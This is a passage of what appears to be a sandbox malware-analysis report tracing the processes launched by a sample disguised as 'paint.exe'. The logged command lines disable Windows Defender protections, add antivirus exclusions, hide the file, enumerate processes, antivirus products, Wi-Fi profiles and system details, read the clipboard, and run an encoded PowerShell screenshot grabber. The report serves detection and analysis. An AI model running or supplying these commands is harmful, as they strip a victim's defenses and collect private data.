Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:16:05
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\paint.exe""
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:16:05
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:16:05
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:16:05
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:16:05
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:16:06
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:16:06
Start date:	05/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()"
Imagebase:	0x7ff60ec10000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:16:06
Start date:	05/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +h +s "C:\Users\user\Desktop\paint.exe"
Imagebase:	0x7ff6241e0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:16:06
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:16:06
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:16:07
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:16:07
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7476, Parent PID: 7432

General

Target ID:	19
Start time:	04:16:07
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:16:07
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:16:07
Start date:	05/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff630ed0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:16:07
Start date:	05/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff630ed0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	04:16:08
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	04:16:08
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	04:16:08
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:16:08
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7772, Parent PID: 2132

General

Target ID:	27
Start time:	04:16:08
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	04:16:08
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff61e760000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:	0x7ff67e070000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff630ed0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff6286e0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	04:16:09
Start date:	05/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7e8150000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	04:16:10
Start date:	05/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff69bf10000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	04:16:11
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	04:16:12
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQ